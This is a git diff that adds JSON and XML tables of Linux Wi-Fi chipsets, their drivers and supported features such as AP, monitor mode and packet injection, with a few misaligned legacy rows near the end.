+ "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "p54usb" + }, + { + "Manufacturer": "Lucent", + "Chipset": "HERMES I (WaveLAN\n/IEEE/ORiNOCO)", + "Driver": "orinoco", + "PHY Modes": "b", + "Encrypt.": "WEP, WPA-TKIP", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "oot", + "Bus": "PCI/ PCMCIA/ USB 1.0", + "Notes": "no Bronze support\norinoco\norinoco usb" + }, + { + "Manufacturer": "Marvell", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8310", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8335", + "Driver": "mrv8k", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CB", + "Notes": "mrv8k" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8338", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8385,\n88W8388, 88W8686", + "Driver": "libertas", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB/CF /SDIO", + "Notes": "libertas" + }, + { + "Manufacturer": "Marvell\n(Libertas)", + "Chipset": "88W8388", + "Driver": "libertas_tf", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "n", + "AP": "y", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "USB/CF /SDIO", + "Notes": "OLPC XO-1,\nsupports mesh" + }, + { + "Manufacturer": "Marvell\n(TopDog)", + "Chipset": "88W8360, 88W8361,\n88W8362 (USB),\n88W8362E, 88W8363", + "Driver": "none", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/PCIe/ CB/USB2.0", + "Notes": "" + }, + { + "Manufacturer": "Marvell\n(TopDog/\nAvastar*)", + "Chipset": "88W8366, 88W8863,\n88W8687, 88W8764*", + "Driver": "mwl8k", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "y", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "mwl8k" + }, + { + "Manufacturer": "Marvell\n(Avastar)", + "Chipset": "88W8797 (88W8786U)", + "Driver": "mwifiex", + "PHY Modes": "a/b/g/n", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "USB", + "Notes": "1286:2049\nmwifiex" + }, + { + "Manufacturer": "Marvell\n(Avastar)", + "Chipset": "88W8786, 88W8787,\n88W8797, 88W8897*", + "Driver": "mwifiex", + "PHY Modes": "a/b/g/n (+ac)*", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "SDIO", + "Notes": "02df:9139\nmwifiex" + }, + { + "Manufacturer": "Marvell\n(Avastar)", + "Chipset": "88W8766, 88W8897*", + "Driver": "mwifiex", + "PHY Modes": "a/b/g/n (+ac)*", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "11ab:2b38\nmwifiex" + }, + { + "Manufacturer": "Marvell\n(Avastar) AC*", + "Chipset": "88W8864*, 88W8897*", + "Driver": "mwlwifi", + "PHY Modes": "a/b/g/n (+ac)*", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "iwlwifi\nWRT1900\niwlwifi" + }, + { + "Manufacturer": "Marvell", + "Chipset": "unknown", + "Driver": "mrvl_cb82", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "MediaTek", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "MediaTek", + "Chipset": "MT5911N", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "SDIO", + "Notes": "" + }, + { + "Manufacturer": "MediaTek", + "Chipset": "MT7601U", + "Driver": "mt7601u", + "PHY Modes": "a/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB", + "Notes": "vendor driver" + }, + { + "Manufacturer": "MediaTek", + "Chipset": "MT7610U", + "Driver": "mt7601u", + "PHY Modes": "a/b/g/n (+ac)*", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB", + "Notes": "vendor driver" + }, + { + "Manufacturer": "Metalink", + "Chipset": "MtW817x", + "Driver": "none", + "PHY Modes": "a/(b)/(g)/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI", + "Notes": "" + }, + { + "Manufacturer": "No Wires Needed", + "Chipset": "Swallow", + "Driver": "swallow_cs", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCMCIA", + "Notes": "obsolete out of kernel driver" + }, + { + "Manufacturer": "No Wires Needed", + "Chipset": "Poldhu", + "Driver": "poldhu", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCMCIA", + "Notes": "obsolete out of kernel driver\npoldhu cs" + }, + { + "Manufacturer": "Ralink", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2460", + "Driver": "rt2400pci", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2560", + "Driver": "rt2500pci", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2561, RT2561S, RT2661", + "Driver": "rt61pci", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2571, RT2572", + "Driver": "rt2500usb", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2571W, RT2573, RT2671", + "Driver": "rt73usb", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT3090, RT3091, RT3092, RT3390, RT3060, RT3062, RT3562, RT3592, RT5390, RT3290", + "Driver": "rt2800pci", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "y", + "Mesh": "?", + "Monitor": "y", + "Inj.": "y", + "Bus": "PCI/PCIe /CB", + "Notes": "Wiki" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2760, RT2790, RT2860, RT2880, RT2890, RT3052, RT309x", + "Driver": "rt2860sta", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "y", + "Mesh": "?", + "Monitor": "y", + "Inj.": "n", + "Bus": "PCI/PCIe /CB", + "Notes": "vendor driver" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2770, RT2870, RT2070, RT3070, RT3071, RT3072, RT3370, RT3572, RT5370, RT5572, RT8070", + "Driver": "rt2800usb", + "PHY Modes": "(a)b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y (??)", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "Wiki" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT2770, RT2870, RT2070, RT307x", + "Driver": "rt2870sta", + "PHY Modes": "(a)/b/g/(n)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "vendor driver" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT3572", + "Driver": "rt3572sta", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Ralink", + "Chipset": "RT3573", + "Driver": "none", + "PHY Modes": "a/b/g/n", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "three stream" + }, + { + "Manufacturer": "Realtek", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8180L, RTL8185L,\nRTL8187SE (3.15+)", + "Driver": "rtl8180", + "PHY Modes": "b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCI/CB", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8187L, RTL8187B", + "Driver": "rtl8187", + "PHY Modes": "b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "n", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8187SE", + "Driver": "rtl8187se", + "PHY Modes": "b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8190", + "Driver": "r8190_pci", + "PHY Modes": "b/g/n", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI\n/ CB", + "Notes": "vendor driver" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8192E", + "Driver": "r8192e_pci", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "staging (vendor) driver" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8191SE, RTL8192SE", + "Driver": "rtl8192se", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCIe", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8192U", + "Driver": "r8192u_usb", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "USB 2.0", + "Notes": "staging (vendor) driver" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8188SU, RTL8191SU, RTL8192SU", + "Driver": "r8712u", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "staging (vendor) driver" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8188SU, RTL8191SU, RTL8192SU", + "Driver": "r8192s_usb", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "USB 2.0", + "Notes": "staging (vendor) driver, superseded by r8712u" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8188CE, RTL8192CE", + "Driver": "rtl8192ce", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCIe", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8188CUS, RTL8192CU, RTL8188RU", + "Driver": "rtl8192cu", + "PHY Modes": "b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "?", + "Monitor": "y", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8192DU", + "Driver": "rtl8192du", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "USB 2.0", + "Notes": "driver available here, may panic on init on some kernels" + }, + { + "Manufacturer": "Realtek", + "Chipset": "RTL8192DE", + "Driver": "rtl8192de", + "PHY Modes": "a/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCIe", + "Notes": "" + }, + { + "Manufacturer": "Renesas", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Renesas", + "Chipset": "KS7010", + "Driver": "ks7010", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "SDIO", + "Notes": "from Javi Roman" + }, + { + "Manufacturer": "ShareWave / Cirrus Logic", + "Chipset": "Bodega", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/ PCMCIA/ USB 1.0", + "Notes": "rare devices, support the proprietary Whitecap protocol" + }, + { + "Manufacturer": "SiS", + "Chipset": "160", + "Driver": "sis160", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI", + "Notes": "rare devices, driver is a useless binary blob" + }, + { + "Manufacturer": "SiS", + "Chipset": "162, 162U", + "Driver": "sis162", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "PCI/ USB 2.0", + "Notes": "driver is a useless binary blob" + }, + { + "Manufacturer": "SiS", + "Chipset": "163, 163U", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/CF/ USB 2.0", + "Notes": "" + }, + { + "Manufacturer": "ST-Ericsson", + "Chipset": "CW1100, CW1200", + "Driver": "cw1200", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "SDIO\n/ PCI", + "Notes": "(since 3.11)" + }, + { + "Manufacturer": "ST-NXP", + "Chipset": "STLC4560", + "Driver": "p54spi", + "PHY Modes": "b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "SPI", + "Notes": "" + }, + { + "Manufacturer": "Symbol", + "Chipset": "Spectrum24 DS", + "Driver": "orinoco", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "n", + "Bus": "PCI/ PCMCIA", + "Notes": "orinoco" + }, + { + "Manufacturer": "Syntek/3DSP", + "Chipset": "unknown\n(Bluew-2310x)", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI", + "Notes": "compiled modules available" + }, + { + "Manufacturer": "Syntek/3DSP", + "Chipset": "STK9100+STK9230\n(Bluew-2310u)", + "Driver": "3dspusbwlan", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "USB 2.0", + "Notes": "partial source?" + }, + { + "Manufacturer": "Texas Instruments", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Texas Instruments", + "Chipset": "ACX100 (TNETW1100), ACX101 (TNETW1100B), ACX111 (TNETW1130), TNETW1450", + "Driver": "acx1xx", + "PHY Modes": "b/(g)", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "y", + "Inj.": "?", + "Bus": "PCI/CB /USB", + "Notes": "acx100\nacx" + }, + { + "Manufacturer": "Texas Instruments", + "Chipset": "WL1251", + "Driver": "wl1251", + "PHY Modes": "b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "n", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "SPI/ SDIO", + "Notes": "" + }, + { + "Manufacturer": "Texas Instruments", + "Chipset": "WL1271", + "Driver": "wl1271", + "PHY Modes": "(a)/b/g/n", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "SPI/ SDIO", + "Notes": "" + }, + { + "Manufacturer": "VIA", + "Chipset": "VT6551", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "?", + "Bus": "PCI", + "Notes": "" + }, + { + "Manufacturer": "VIA", + "Chipset": "VT6555", + "Driver": "vt6655", + "PHY Modes": "(a)/b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCI", + "Notes": "staging (vendor) driver\nvt6656" + }, + { + "Manufacturer": "VIA", + "Chipset": "VT6556", + "Driver": "vt6656", + "PHY Modes": "(a)/b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCI", + "Notes": "staging (vendor) driver\nvt6656" + }, + { + "Manufacturer": "WavePlus", + "Chipset": "WP1200", + "Driver": "none", + "PHY Modes": "b", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI/ PCMCIA", + "Notes": "devices not common" + }, + { + "Manufacturer": "Winbond", + "Chipset": "W89C33D", + "Driver": "none", + "PHY Modes": "b/g", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "PCI", + "Notes": "devices not common" + }, + { + "Manufacturer": "Winbond", + "Chipset": "W89C35D", + "Driver": "winbond", + "PHY Modes": "b/g", + "Encrypt.": "?", + "Station": "y", + "Ad-hoc": "?", + "AP": "n", + "Mesh": "n", + "Monitor": "n", + "Inj.": "n", + "Bus": "USB 2.0", + "Notes": "staging (vendor) driver only supports 'b'\nw35und" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "", + "Driver": "", + "PHY Modes": "", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1201", + "Driver": "zd1201", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "y", + "Inj.": "?", + "Bus": "USB 1.0", + "Notes": "zd1201" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1201", + "Driver": "zdsta", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "USB 1.0", + "Notes": "obsolete vendor driver" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1201", + "Driver": "zdsta", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "y", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "?", + "Monitor": "?", + "Inj.": "n", + "Bus": "PCMCIA", + "Notes": "obsolete vendor driver, devices not common" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1202", + "Driver": "zdsta", + "PHY Modes": "b", + "Encrypt.": "WEP", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "", + "Monitor": "", + "Inj.": "n", + "Bus": "PCI/CB/ PCMCIA", + "Notes": "obsolete vendor driver, devices not common" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1211/ZD1211B", + "Driver": "zd1211rw", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "y", + "Monitor": "y", + "Inj.": "y", + "Bus": "USB 1.0", + "Notes": "5GHz band not supported, no hw crypto\nzd1211rw" + }, + { + "Manufacturer": "ZyDAS", + "Chipset": "ZD1212/ZD1212B", + "Driver": "zd1212", + "PHY Modes": "(a)/b/g", + "Encrypt.": "WEP, WPA, WPA2", + "Station": "y", + "Ad-hoc": "y", + "AP": "y", + "Mesh": "", + "Monitor": "", + "Inj.": "n", + "Bus": "PCI/CB", + "Notes": "obsolete vendor driver, devices not common" + }, + { + "Manufacturer": "Manufacturer", + "Chipset": "Chipset", + "Driver": "Driver", + "PHY Modes": "PHY Modes", + "Encrypt.": "Station", + "Station": "Ad-hoc", + "Ad-hoc": "AP", + "AP": "Monitor", + "Mesh": "Bus", + "Monitor": "Notes", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Aironet", + "Chipset": "ARLAN", + "Driver": "arlan", + "PHY Modes": "pre-b (900MHz or 2.4GHz)", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "ISA", + "Monitor": "driver abandoned", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Lucent", + "Chipset": "WaveLAN", + "Driver": "wavelan", + "PHY Modes": "pre-b (900MHz or 2.4GHz)", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "PCMCIA/ISA", + "Monitor": "driver abandoned", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Raytheon", + "Chipset": "Raylink", + "Driver": "ray_cs", + "PHY Modes": "2.4GHz FHSS", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "PCMCIA", + "Monitor": "USB variants not supported", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "ShareWave", + "Chipset": "chipset before\nBodega (Epic?)", + "Driver": "none", + "PHY Modes": "Whitecap", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "PCI/PCMCIA", + "Monitor": "uncommon devices", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Symbol", + "Chipset": "Spectrum24 FHSS", + "Driver": "none", + "PHY Modes": "2.4GHz FHSS", + "Encrypt.": "", + "Station": "", + "Ad-hoc": "", + "AP": "", + "Mesh": "PCMCIA", + "Monitor": "", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "Xircom", + "Chipset": "Netwave", + "Driver": "netwave_cs", + "PHY Modes": "pre-b, 1Mb", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "PCMCIA", + "Monitor": "driver abandoned", + "Inj.": "", + "Bus": "", + "Notes": "" + }, + { + "Manufacturer": "AMD", + "Chipset": "Am79C930\n(presumably)", + "Driver": "wl3501_cs", + "PHY Modes": "2Mb, pre-802.11b", + "Encrypt.": "?", + "Station": "?", + "Ad-hoc": "?", + "AP": "?", + "Mesh": "PCMCIA", + "Monitor": "PRISM I based RF", + "Inj.": "", + "Bus": "", + "Notes": "" + } +] \ No newline at end of file diff --git a/misc/devices.xml b/misc/devices.xml new file mode 100644 index 0000000..a312fe4 --- /dev/null +++ b/misc/devices.xml @@ -0,0 +1,2164 @@ + + + + ADMtek + ADM8211, ADM8211B + adm8211 + WEP + ? + ? + ? + ? + ? + ? + PCI/CB + currently broken AFAIK +adm8211 + b + + + Agere + HERMES II (WL60010) + wlags49_h2 + ? + y + ? + n + n + n + n + PCI/ PCMCIA + staging (vendor) driver +wlags49_h2 + b + + + Agere + HERMES II.5 (WL60040) + wlags49_h25 + ? + y + ? + n + n + n + n + PCI/ PCMCIA + staging (vendor) driver, not all devices supported +wlags49_h25 + (a)/b/g + + + Airgo + AGN100/AGN300 pre-N + agnx + + n + n + n + n + n + n + PCI/CB + driver never completed, abandoned +agnx + (a)b/g + + + Airgo + AGN300 pre-N USB + none + + + + + + + + USB 2.0 + devices not common + b/g + + + Aironet / +Cisco + 4500, 4800, +Cisco 340/350 + airo + WEP, WPA-TKIP + y + ? + ? + n + y + n + ISA/PCI /PCMCIA + airo + b + + + ALi + M4301A + none + + + + + + + + PCI/CB + devices not common (mainly WUSB11 v4) + b + + + AMD + Alchemy AM1772 + none + + + + + + + + PCI/CB + see this abomination + b + + + Atheros + + + + + + + + + + + + + + + Atheros + AR5000 + ath5k + + b + b + b + b + y + b + PCI/CB + tx support currently broken +ath5k + a + + + Atheros + AR5001A-AR5007EG + ath5k + WEP, WPA, WPA2 + y + y + y + y + y + y + PCI/PCIe /CB + ath5k + (a)/b/(g) + + + Atheros + AR5000-AR5007EG + madwifi + WEP, WPA, WPA2 + y + y + y + ? + y + 